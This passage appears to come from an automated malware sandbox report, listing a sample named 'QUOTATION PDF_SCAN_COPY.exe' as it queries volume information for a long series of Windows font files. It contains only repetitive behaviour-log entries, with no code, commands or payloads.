          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
